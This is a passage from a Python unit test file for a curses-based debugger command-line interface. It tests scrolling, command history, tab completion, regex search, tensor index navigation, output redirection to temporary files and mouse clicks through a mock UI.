self.assertEqual(1, len(ui.wrapped_outputs))
self.assertEqual(1, len(ui.scroll_messages))
self.assertEqual(["ERROR: Invalid command prefix \"foo\""],
ui.unwrapped_outputs[0].lines)
# TODO(cais): Add explanation for the 35 extra lines.
self.assertEqual(["ERROR: Invalid command prefix \"foo\""],
ui.wrapped_outputs[0].lines[:1])
# A single line of output should not have caused scrolling.
self.assertNotIn("Scroll", ui.scroll_messages[0])
self.assertIn("Mouse:", ui.scroll_messages[0])
def testRunUIInvalidCommandSyntax(self):
"""Handle a command with invalid syntax."""
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("babble -z\n"), self._EXIT])
ui.register_command_handler("babble", self._babble, "")
ui.run_ui()
# Screen output/scrolling should have happened exactly once.
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual(1, len(ui.wrapped_outputs))
self.assertEqual(1, len(ui.scroll_messages))
self.assertIn("Mouse:", ui.scroll_messages[0])
self.assertEqual(
["Syntax error for command: babble", "For help, do \"help babble\""],
ui.unwrapped_outputs[0].lines)
def testRunUIScrollTallOutputPageDownUp(self):
"""Scroll tall output with PageDown and PageUp."""
# Use PageDown and PageUp to scroll back and forth a little before exiting.
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("babble\n"), [curses.KEY_NPAGE] * 2 +
[curses.KEY_PPAGE] + self._EXIT])
ui.register_command_handler("babble", self._babble, "")
ui.run_ui()
# Screen output/scrolling should have happened exactly once.
self.assertEqual(4, len(ui.unwrapped_outputs))
self.assertEqual(4, len(ui.wrapped_outputs))
self.assertEqual(4, len(ui.scroll_messages))
# Before scrolling.
self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[0].lines)
self.assertEqual(["bar"] * 60, ui.wrapped_outputs[0].lines[:60])
# Initial scroll: At the top.
self.assertIn("Scroll (PgDn): 0.00%", ui.scroll_messages[0])
self.assertIn("Mouse:", ui.scroll_messages[0])
# After 1st scrolling (PageDown).
# The screen output shouldn't have changed. Only the viewport should.
self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[0].lines)
self.assertEqual(["bar"] * 60, ui.wrapped_outputs[0].lines[:60])
self.assertIn("Scroll (PgDn/PgUp): 1.69%", ui.scroll_messages[1])
self.assertIn("Mouse:", ui.scroll_messages[1])
# After 2nd scrolling (PageDown).
self.assertIn("Scroll (PgDn/PgUp): 3.39%", ui.scroll_messages[2])
self.assertIn("Mouse:", ui.scroll_messages[2])
# After 3rd scrolling (PageUp).
self.assertIn("Scroll (PgDn/PgUp): 1.69%", ui.scroll_messages[3])
self.assertIn("Mouse:", ui.scroll_messages[3])
def testCutOffTooManyOutputLines(self):
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("babble -n 20\n"), self._EXIT])
# Modify max_output_lines so that this test doesn't use too much time or
# memory.
ui.max_output_lines = 10
ui.register_command_handler("babble", self._babble, "")
ui.run_ui()
self.assertEqual(["bar"] * 10 + ["Output cut off at 10 lines!"],
ui.wrapped_outputs[0].lines[:11])
def testRunUIScrollTallOutputEndHome(self):
"""Scroll tall output with PageDown and PageUp."""
# Use End and Home to scroll a little before exiting to test scrolling.
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble\n"),
[curses.KEY_END] * 2 + [curses.KEY_HOME] + self._EXIT
])
ui.register_command_handler("babble", self._babble, "")
ui.run_ui()
# Screen output/scrolling should have happened exactly once.
self.assertEqual(4, len(ui.unwrapped_outputs))
self.assertEqual(4, len(ui.wrapped_outputs))
self.assertEqual(4, len(ui.scroll_messages))
# Before scrolling.
self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[0].lines)
self.assertEqual(["bar"] * 60, ui.wrapped_outputs[0].lines[:60])
# Initial scroll: At the top.
self.assertIn("Scroll (PgDn): 0.00%", ui.scroll_messages[0])
# After 1st scrolling (End).
self.assertIn("Scroll (PgUp): 100.00%", ui.scroll_messages[1])
# After 2nd scrolling (End).
self.assertIn("Scroll (PgUp): 100.00%", ui.scroll_messages[2])
# After 3rd scrolling (Hhome).
self.assertIn("Scroll (PgDn): 0.00%", ui.scroll_messages[3])
def testRunUIWithInitCmd(self):
"""Run UI with an initial command specified."""
ui = MockCursesUI(40, 80, command_sequence=[self._EXIT])
ui.register_command_handler("babble", self._babble, "")
ui.run_ui(init_command="babble")
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[0].lines)
self.assertEqual(["bar"] * 60, ui.wrapped_outputs[0].lines[:60])
self.assertIn("Scroll (PgDn): 0.00%", ui.scroll_messages[0])
def testCompileHelpWithoutHelpIntro(self):
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("help\n"), self._EXIT])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.run_ui()
self.assertEqual(["babble", " Aliases: b", "", " babble some"],
ui.unwrapped_outputs[0].lines[:4])
def testCompileHelpWithHelpIntro(self):
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("help\n"), self._EXIT])
help_intro = debugger_cli_common.RichTextLines(
["This is a curses UI.", "All it can do is 'babble'.", ""])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.set_help_intro(help_intro)
ui.run_ui()
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual(
help_intro.lines + ["babble", " Aliases: b", "", " babble some"],
ui.unwrapped_outputs[0].lines[:7])
def testCommandHistoryNavBackwardOnce(self):
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("help\n"),
[curses.KEY_UP], # Hit Up and Enter.
string_to_codes("\n"),
self._EXIT])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.run_ui()
self.assertEqual(2, len(ui.unwrapped_outputs))
for i in [0, 1]:
self.assertEqual(["babble", " Aliases: b", "", " babble some"],
ui.unwrapped_outputs[i].lines[:4])
def testCommandHistoryNavBackwardTwice(self):
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("help\n"),
string_to_codes("babble\n"),
[curses.KEY_UP],
[curses.KEY_UP], # Hit Up twice and Enter.
string_to_codes("\n"),
self._EXIT])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.run_ui()
self.assertEqual(3, len(ui.unwrapped_outputs))
# The 1st and 3rd outputs are for command "help".
for i in [0, 2]:
self.assertEqual(["babble", " Aliases: b", "", " babble some"],
ui.unwrapped_outputs[i].lines[:4])
# The 2nd output is for command "babble".
self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[1].lines)
def testCommandHistoryNavBackwardOverLimit(self):
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("help\n"),
string_to_codes("babble\n"),
[curses.KEY_UP],
[curses.KEY_UP],
[curses.KEY_UP], # Hit Up three times and Enter.
string_to_codes("\n"),
self._EXIT])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.run_ui()
self.assertEqual(3, len(ui.unwrapped_outputs))
# The 1st and 3rd outputs are for command "help".
for i in [0, 2]:
self.assertEqual(["babble", " Aliases: b", "", " babble some"],
ui.unwrapped_outputs[i].lines[:4])
# The 2nd output is for command "babble".
self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[1].lines)
def testCommandHistoryNavBackwardThenForward(self):
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("help\n"),
string_to_codes("babble\n"),
[curses.KEY_UP],
[curses.KEY_UP],
[curses.KEY_DOWN], # Hit Up twice and Down once.
string_to_codes("\n"),
self._EXIT])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.run_ui()
self.assertEqual(3, len(ui.unwrapped_outputs))
# The 1st output is for command "help".
self.assertEqual(["babble", " Aliases: b", "", " babble some"],
ui.unwrapped_outputs[0].lines[:4])
# The 2nd and 3rd outputs are for command "babble".
for i in [1, 2]:
self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[i].lines)
def testCommandHistoryPrefixNavBackwardOnce(self):
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble -n 1\n"),
string_to_codes("babble -n 10\n"),
string_to_codes("help\n"),
string_to_codes("b") + [curses.KEY_UP], # Navigate with prefix.
string_to_codes("\n"),
self._EXIT
])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.run_ui()
self.assertEqual(["bar"], ui.unwrapped_outputs[0].lines)
self.assertEqual(["bar"] * 10, ui.unwrapped_outputs[1].lines)
self.assertEqual(["babble", " Aliases: b", "", " babble some"],
ui.unwrapped_outputs[2].lines[:4])
self.assertEqual(["bar"] * 10, ui.unwrapped_outputs[3].lines)
def testTerminalResize(self):
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("babble\n"),
[curses.KEY_RESIZE, 100, 85], # Resize to [100, 85]
self._EXIT])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.run_ui()
# The resize event should have caused a second screen output event.
self.assertEqual(2, len(ui.unwrapped_outputs))
self.assertEqual(2, len(ui.wrapped_outputs))
self.assertEqual(2, len(ui.scroll_messages))
# The 1st and 2nd screen outputs should be identical (unwrapped).
self.assertEqual(ui.unwrapped_outputs[0], ui.unwrapped_outputs[1])
# The 1st scroll info should contain scrolling, because the screen size
# is less than the number of lines in the output.
self.assertIn("Scroll (PgDn): 0.00%", ui.scroll_messages[0])
def testTabCompletionWithCommonPrefix(self):
# Type "b" and trigger tab completion.
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("b\t"), string_to_codes("\n"),
self._EXIT])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["ba"])
ui.run_ui()
# The automatically registered exit commands "exit" and "quit" should not
# appear in the tab completion candidates because they don't start with
# "b".
self.assertEqual([["ba", "babble"]], ui.candidates_lists)
# "ba" is a common prefix of the two candidates. So the "ba" command should
# have been issued after the Enter.
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual(1, len(ui.wrapped_outputs))
self.assertEqual(1, len(ui.scroll_messages))
self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[0].lines)
self.assertEqual(["bar"] * 60, ui.wrapped_outputs[0].lines[:60])
def testTabCompletionEmptyTriggerWithoutCommonPrefix(self):
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("\t"), # Trigger tab completion.
string_to_codes("\n"),
self._EXIT])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["a"])
# Use a different alias "a" instead.
ui.run_ui()
# The manually registered command, along with the automatically registered
# exit commands should appear in the candidates.
self.assertEqual(
[["a", "babble", "cfg", "config", "exit", "h", "help", "m", "mouse",
"quit"]], ui.candidates_lists)
# The two candidates have no common prefix. So no command should have been
# issued.
self.assertEqual(0, len(ui.unwrapped_outputs))
self.assertEqual(0, len(ui.wrapped_outputs))
self.assertEqual(0, len(ui.scroll_messages))
def testTabCompletionNonemptyTriggerSingleCandidate(self):
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("b\t"), # Trigger tab completion.
string_to_codes("\n"),
self._EXIT])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["a"])
ui.run_ui()
# There is only one candidate, so no candidates should have been displayed.
# Instead, the completion should have been automatically keyed in, leading
# to the "babble" command being issue.
self.assertEqual([[]], ui.candidates_lists)
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual(1, len(ui.wrapped_outputs))
self.assertEqual(1, len(ui.scroll_messages))
self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[0].lines)
self.assertEqual(["bar"] * 60, ui.wrapped_outputs[0].lines[:60])
def testTabCompletionNoMatch(self):
ui = MockCursesUI(
40,
80,
command_sequence=[string_to_codes("c\t"), # Trigger tab completion.
string_to_codes("\n"),
self._EXIT])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["a"])
ui.run_ui()
# Only the invalid command "c" should have been issued.
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual(1, len(ui.wrapped_outputs))
self.assertEqual(1, len(ui.scroll_messages))
self.assertEqual(["ERROR: Invalid command prefix \"c\""],
ui.unwrapped_outputs[0].lines)
self.assertEqual(["ERROR: Invalid command prefix \"c\""],
ui.wrapped_outputs[0].lines[:1])
def testTabCompletionOneWordContext(self):
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble -n 3\t"), # Trigger tab completion.
string_to_codes("\n"),
self._EXIT
])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.register_tab_comp_context(["babble", "b"], ["10", "20", "30", "300"])
ui.run_ui()
self.assertEqual([["30", "300"]], ui.candidates_lists)
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual(1, len(ui.wrapped_outputs))
self.assertEqual(1, len(ui.scroll_messages))
self.assertEqual(["bar"] * 30, ui.unwrapped_outputs[0].lines)
self.assertEqual(["bar"] * 30, ui.wrapped_outputs[0].lines[:30])
def testTabCompletionTwice(self):
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble -n 1\t"), # Trigger tab completion.
string_to_codes("2\t"), # With more prefix, tab again.
string_to_codes("3\n"),
self._EXIT
])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.register_tab_comp_context(["babble", "b"], ["10", "120", "123"])
ui.run_ui()
# There should have been two different lists of candidates.
self.assertEqual([["10", "120", "123"], ["120", "123"]],
ui.candidates_lists)
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual(1, len(ui.wrapped_outputs))
self.assertEqual(1, len(ui.scroll_messages))
self.assertEqual(["bar"] * 123, ui.unwrapped_outputs[0].lines)
self.assertEqual(["bar"] * 123, ui.wrapped_outputs[0].lines[:123])
def testRegexSearch(self):
"""Test regex search."""
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble -n 3\n"),
string_to_codes("/(b|r)\n"), # Regex search and highlight.
string_to_codes("/a\n"), # Regex search and highlight.
self._EXIT
])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.run_ui()
# The unwrapped (original) output should never have any highlighting.
self.assertEqual(3, len(ui.unwrapped_outputs))
for i in range(3):
self.assertEqual(["bar"] * 3, ui.unwrapped_outputs[i].lines)
self.assertEqual({}, ui.unwrapped_outputs[i].font_attr_segs)
# The wrapped outputs should show highlighting depending on the regex.
self.assertEqual(3, len(ui.wrapped_outputs))
# The first output should have no highlighting.
self.assertEqual(["bar"] * 3, ui.wrapped_outputs[0].lines[:3])
self.assertEqual({}, ui.wrapped_outputs[0].font_attr_segs)
# The second output should have highlighting for "b" and "r".
self.assertEqual(["bar"] * 3, ui.wrapped_outputs[1].lines[:3])
for i in range(3):
self.assertEqual([(0, 1, "black_on_white"), (2, 3, "black_on_white")],
ui.wrapped_outputs[1].font_attr_segs[i])
# The third output should have highlighting for "a" only.
self.assertEqual(["bar"] * 3, ui.wrapped_outputs[1].lines[:3])
for i in range(3):
self.assertEqual([(1, 2, "black_on_white")],
ui.wrapped_outputs[2].font_attr_segs[i])
def testRegexSearchContinuation(self):
"""Test continuing scrolling down to next regex match."""
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble -n 3\n"),
string_to_codes("/(b|r)\n"), # Regex search and highlight.
string_to_codes("/\n"), # Continue scrolling down: 1st time.
string_to_codes("/\n"), # Continue scrolling down: 2nd time.
string_to_codes("/\n"), # Continue scrolling down: 3rd time.
string_to_codes("/\n"), # Continue scrolling down: 4th time.
self._EXIT
])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.run_ui()
# The 1st output is for the non-searched output. The other three are for
# the searched output. Even though continuation search "/" is performed
# four times, there should be only three searched outputs, because the
# last one has exceeded the end.
self.assertEqual(4, len(ui.unwrapped_outputs))
for i in range(4):
self.assertEqual(["bar"] * 3, ui.unwrapped_outputs[i].lines)
self.assertEqual({}, ui.unwrapped_outputs[i].font_attr_segs)
self.assertEqual(["bar"] * 3, ui.wrapped_outputs[0].lines[:3])
self.assertEqual({}, ui.wrapped_outputs[0].font_attr_segs)
for j in range(1, 4):
self.assertEqual(["bar"] * 3, ui.wrapped_outputs[j].lines[:3])
self.assertEqual({
0: [(0, 1, "black_on_white"), (2, 3, "black_on_white")],
1: [(0, 1, "black_on_white"), (2, 3, "black_on_white")],
2: [(0, 1, "black_on_white"), (2, 3, "black_on_white")]
}, ui.wrapped_outputs[j].font_attr_segs)
self.assertEqual([0, 0, 1, 2], ui.output_pad_rows)
def testRegexSearchUnderLineWrapping(self):
ui = MockCursesUI(
40,
6, # Use a narrow window to trigger line wrapping
command_sequence=[
string_to_codes("babble -n 3 -l foo-bar-baz-qux\n"),
string_to_codes("/foo\n"), # Regex search and highlight.
string_to_codes("/\n"), # Continue scrolling down: 1st time.
string_to_codes("/\n"), # Continue scrolling down: 2nd time.
string_to_codes("/\n"), # Continue scrolling down: 3rd time.
string_to_codes("/\n"), # Continue scrolling down: 4th time.
self._EXIT
])
ui.register_command_handler(
"babble", self._babble, "babble some")
ui.run_ui()
self.assertEqual(4, len(ui.wrapped_outputs))
for wrapped_output in ui.wrapped_outputs:
self.assertEqual(["foo-", "bar-", "baz-", "qux"] * 3,
wrapped_output.lines[0 : 12])
# The scroll location should reflect the line wrapping.
self.assertEqual([0, 0, 4, 8], ui.output_pad_rows)
def testRegexSearchNoMatchContinuation(self):
"""Test continuing scrolling when there is no regex match."""
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble -n 3\n"),
string_to_codes("/foo\n"), # Regex search and highlight.
string_to_codes("/\n"), # Continue scrolling down.
self._EXIT
])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.run_ui()
# The regex search and continuation search in the 3rd command should not
# have produced any output.
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual([0], ui.output_pad_rows)
def testRegexSearchContinuationWithoutSearch(self):
"""Test continuation scrolling when no regex search has been performed."""
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble -n 3\n"),
string_to_codes("/\n"), # Continue scrolling without search first.
self._EXIT
])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.run_ui()
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual([0], ui.output_pad_rows)
def testRegexSearchWithInvalidRegex(self):
"""Test using invalid regex to search."""
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble -n 3\n"),
string_to_codes("/[\n"), # Continue scrolling without search first.
self._EXIT
])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.run_ui()
# Invalid regex should not have led to a new screen of output.
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual([0], ui.output_pad_rows)
# Invalid regex should have led to a toast error message.
self.assertEqual(
[MockCursesUI._UI_WAIT_MESSAGE,
"ERROR: Invalid regular expression: \"[\"",
MockCursesUI._UI_WAIT_MESSAGE],
ui.toasts)
def testRegexSearchFromCommandHistory(self):
"""Test regex search commands are recorded in command history."""
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble -n 3\n"),
string_to_codes("/(b|r)\n"), # Regex search and highlight.
string_to_codes("babble -n 4\n"),
[curses.KEY_UP],
[curses.KEY_UP],
string_to_codes("\n"), # Hit Up twice and Enter.
self._EXIT
])
ui.register_command_handler(
"babble", self._babble, "babble some", prefix_aliases=["b"])
ui.run_ui()
self.assertEqual(4, len(ui.wrapped_outputs))
self.assertEqual(["bar"] * 3, ui.wrapped_outputs[0].lines[:3])
self.assertEqual({}, ui.wrapped_outputs[0].font_attr_segs)
self.assertEqual(["bar"] * 3, ui.wrapped_outputs[1].lines[:3])
for i in range(3):
self.assertEqual([(0, 1, "black_on_white"), (2, 3, "black_on_white")],
ui.wrapped_outputs[1].font_attr_segs[i])
self.assertEqual(["bar"] * 4, ui.wrapped_outputs[2].lines[:4])
self.assertEqual({}, ui.wrapped_outputs[2].font_attr_segs)
# The regex search command loaded from history should have worked on the
# new screen output.
self.assertEqual(["bar"] * 4, ui.wrapped_outputs[3].lines[:4])
for i in range(4):
self.assertEqual([(0, 1, "black_on_white"), (2, 3, "black_on_white")],
ui.wrapped_outputs[3].font_attr_segs[i])
def testDisplayTensorWithIndices(self):
"""Test displaying tensor with indices."""
ui = MockCursesUI(
9, # Use a small screen height to cause scrolling.
80,
command_sequence=[
string_to_codes("print_ones --size 5\n"),
[curses.KEY_NPAGE],
[curses.KEY_NPAGE],
[curses.KEY_NPAGE],
[curses.KEY_END],
[curses.KEY_NPAGE], # This PageDown goes over the bottom limit.
[curses.KEY_PPAGE],
[curses.KEY_PPAGE],
[curses.KEY_PPAGE],
[curses.KEY_HOME],
[curses.KEY_PPAGE], # This PageDown goes over the top limit.
self._EXIT
])
ui.register_command_handler("print_ones", self._print_ones,
"print an all-one matrix of specified size")
ui.run_ui()
self.assertEqual(11, len(ui.unwrapped_outputs))
self.assertEqual(11, len(ui.output_array_pointer_indices))
self.assertEqual(11, len(ui.scroll_messages))
for i in range(11):
self.assertEqual([
"Tensor \"m\":", "", "array([[ 1., 1., 1., 1., 1.],",
" [ 1., 1., 1., 1., 1.],",
" [ 1., 1., 1., 1., 1.],",
" [ 1., 1., 1., 1., 1.],",
" [ 1., 1., 1., 1., 1.]])"
], ui.unwrapped_outputs[i].lines)
self.assertEqual({
0: None,
-1: [1, 0]
}, ui.output_array_pointer_indices[0])
self.assertIn(" Scroll (PgDn): 0.00% -[1,0] ", ui.scroll_messages[0])
# Scrolled down one line.
self.assertEqual({
0: None,
-1: [2, 0]
}, ui.output_array_pointer_indices[1])
self.assertIn(" Scroll (PgDn/PgUp): 16.67% -[2,0] ", ui.scroll_messages[1])
# Scrolled down one line.
self.assertEqual({
0: [0, 0],
-1: [3, 0]
}, ui.output_array_pointer_indices[2])
self.assertIn(" Scroll (PgDn/PgUp): 33.33% [0,0]-[3,0] ",
ui.scroll_messages[2])
# Scrolled down one line.
self.assertEqual({
0: [1, 0],
-1: [4, 0]
}, ui.output_array_pointer_indices[3])
self.assertIn(" Scroll (PgDn/PgUp): 50.00% [1,0]-[4,0] ",
ui.scroll_messages[3])
# Scroll to the bottom.
self.assertEqual({
0: [4, 0],
-1: None
}, ui.output_array_pointer_indices[4])
self.assertIn(" Scroll (PgUp): 100.00% [4,0]- ", ui.scroll_messages[4])
# Attempt to scroll beyond the bottom should lead to no change.
self.assertEqual({
0: [4, 0],
-1: None
}, ui.output_array_pointer_indices[5])
self.assertIn(" Scroll (PgUp): 100.00% [4,0]- ", ui.scroll_messages[5])
# Scrolled up one line.
self.assertEqual({
0: [3, 0],
-1: None
}, ui.output_array_pointer_indices[6])
self.assertIn(" Scroll (PgDn/PgUp): 83.33% [3,0]- ", ui.scroll_messages[6])
# Scrolled up one line.
self.assertEqual({
0: [2, 0],
-1: None
}, ui.output_array_pointer_indices[7])
self.assertIn(" Scroll (PgDn/PgUp): 66.67% [2,0]- ", ui.scroll_messages[7])
# Scrolled up one line.
self.assertEqual({
0: [1, 0],
-1: [4, 0]
}, ui.output_array_pointer_indices[8])
self.assertIn(" Scroll (PgDn/PgUp): 50.00% [1,0]-[4,0] ",
ui.scroll_messages[8])
# Scroll to the top.
self.assertEqual({
0: None,
-1: [1, 0]
}, ui.output_array_pointer_indices[9])
self.assertIn(" Scroll (PgDn): 0.00% -[1,0] ", ui.scroll_messages[9])
# Attempt to scroll pass the top limit should lead to no change.
self.assertEqual({
0: None,
-1: [1, 0]
}, ui.output_array_pointer_indices[10])
self.assertIn(" Scroll (PgDn): 0.00% -[1,0] ", ui.scroll_messages[10])
def testScrollTensorByValidIndices(self):
"""Test scrolling to specified (valid) indices in a tensor."""
ui = MockCursesUI(
8, # Use a small screen height to cause scrolling.
80,
command_sequence=[
string_to_codes("print_ones --size 5\n"),
string_to_codes("@[0, 0]\n"), # Scroll to element [0, 0].
string_to_codes("@1,0\n"), # Scroll to element [3, 0].
string_to_codes("@[0,2]\n"), # Scroll back to line 0.
self._EXIT
])
ui.register_command_handler("print_ones", self._print_ones,
"print an all-one matrix of specified size")
ui.run_ui()
self.assertEqual(4, len(ui.unwrapped_outputs))
self.assertEqual(4, len(ui.output_array_pointer_indices))
for i in range(4):
self.assertEqual([
"Tensor \"m\":", "", "array([[ 1., 1., 1., 1., 1.],",
" [ 1., 1., 1., 1., 1.],",
" [ 1., 1., 1., 1., 1.],",
" [ 1., 1., 1., 1., 1.],",
" [ 1., 1., 1., 1., 1.]])"
], ui.unwrapped_outputs[i].lines)
self.assertEqual({
0: None,
-1: [0, 0]
}, ui.output_array_pointer_indices[0])
self.assertEqual({
0: [0, 0],
-1: [2, 0]
}, ui.output_array_pointer_indices[1])
self.assertEqual({
0: [1, 0],
-1: [3, 0]
}, ui.output_array_pointer_indices[2])
self.assertEqual({
0: [0, 0],
-1: [2, 0]
}, ui.output_array_pointer_indices[3])
def testScrollTensorByInvalidIndices(self):
"""Test scrolling to specified invalid indices in a tensor."""
ui = MockCursesUI(
8, # Use a small screen height to cause scrolling.
80,
command_sequence=[
string_to_codes("print_ones --size 5\n"),
string_to_codes("@[10, 0]\n"), # Scroll to invalid indices.
string_to_codes("@[]\n"), # Scroll to invalid indices.
string_to_codes("@\n"), # Scroll to invalid indices.
self._EXIT
])
ui.register_command_handler("print_ones", self._print_ones,
"print an all-one matrix of specified size")
ui.run_ui()
# Because all scroll-by-indices commands are invalid, there should be only
# one output event.
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual(1, len(ui.output_array_pointer_indices))
# Check error messages.
self.assertEqual("ERROR: Indices exceed tensor dimensions.", ui.toasts[2])
self.assertEqual("ERROR: invalid literal for int() with base 10: ''",
ui.toasts[4])
self.assertEqual("ERROR: Empty indices.", ui.toasts[6])
def testWriteScreenOutputToFileWorks(self):
output_path = tempfile.mktemp()
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble -n 2>%s\n" % output_path),
self._EXIT
])
ui.register_command_handler("babble", self._babble, "")
ui.run_ui()
self.assertEqual(1, len(ui.unwrapped_outputs))
with gfile.Open(output_path, "r") as f:
self.assertEqual("bar\nbar\n", f.read())
# Clean up output file.
gfile.Remove(output_path)
def testIncompleteRedirectErrors(self):
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble -n 2 >\n"),
self._EXIT
])
ui.register_command_handler("babble", self._babble, "")
ui.run_ui()
self.assertEqual(["ERROR: Redirect file path is empty"], ui.toasts)
self.assertEqual(0, len(ui.unwrapped_outputs))
def testAppendingRedirectErrors(self):
output_path = tempfile.mktemp()
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble -n 2 >> %s\n" % output_path),
self._EXIT
])
ui.register_command_handler("babble", self._babble, "")
ui.run_ui()
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual(
["Syntax error for command: babble", "For help, do \"help babble\""],
ui.unwrapped_outputs[0].lines)
# Clean up output file.
gfile.Remove(output_path)
def testMouseOffTakesEffect(self):
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("mouse off\n"), string_to_codes("babble\n"),
self._EXIT
])
ui.register_command_handler("babble", self._babble, "")
ui.run_ui()
self.assertFalse(ui._mouse_enabled)
self.assertIn("Mouse: OFF", ui.scroll_messages[-1])
def testMouseOffAndOnTakeEffect(self):
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("mouse off\n"), string_to_codes("mouse on\n"),
string_to_codes("babble\n"), self._EXIT
])
ui.register_command_handler("babble", self._babble, "")
ui.run_ui()
self.assertTrue(ui._mouse_enabled)
self.assertIn("Mouse: ON", ui.scroll_messages[-1])
def testMouseClickOnLinkTriggersCommand(self):
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble -n 10 -k\n"),
[curses.KEY_MOUSE, 1, 4], # A click on a hyperlink.
self._EXIT
])
ui.register_command_handler("babble", self._babble, "")
ui.run_ui()
self.assertEqual(2, len(ui.unwrapped_outputs))
self.assertEqual(["bar"] * 10, ui.unwrapped_outputs[0].lines)
self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[1].lines)
def testMouseClickOnLinkWithExistingTextTriggersCommand(self):
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble -n 10 -k\n"),
string_to_codes("foo"), # Enter some existing code in the textbox.
[curses.KEY_MOUSE, 1, 4], # A click on a hyperlink.
self._EXIT
])
ui.register_command_handler("babble", self._babble, "")
ui.run_ui()
self.assertEqual(2, len(ui.unwrapped_outputs))
self.assertEqual(["bar"] * 10, ui.unwrapped_outputs[0].lines)
self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[1].lines)
def testMouseClickOffLinkDoesNotTriggersCommand(self):
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble -n 10 -k\n"),
# A click off a hyperlink (too much to the right).
[curses.KEY_MOUSE, 8, 4],
self._EXIT
])
ui.register_command_handler("babble", self._babble, "")
ui.run_ui()
# The mouse click event should not triggered no command.
self.assertEqual(1, len(ui.unwrapped_outputs))
self.assertEqual(["bar"] * 10, ui.unwrapped_outputs[0].lines)
# This command should have generated no main menus.
self.assertEqual([None], ui.main_menu_list)
def testMouseClickOnEnabledMenuItemWorks(self):
ui = MockCursesUI(
40,
80,
command_sequence=[
string_to_codes("babble -n 10 -m\n"),
# A click on the enabled menu item.
[curses.KEY_MOUSE, 3, 2],
self._EXIT
])
ui.register_command_handler("babble", self._babble, "")
ui.run_ui()
self.assertEqual(2, len(ui.unwrapped_outputs))
self.assertEqual(["bar"] * 10, ui.unwrapped_outputs[0].lines)
self.assertEqual(["bar"] * 60, ui.unwrapped_outputs[1].lines)
# Check the content of the menu.
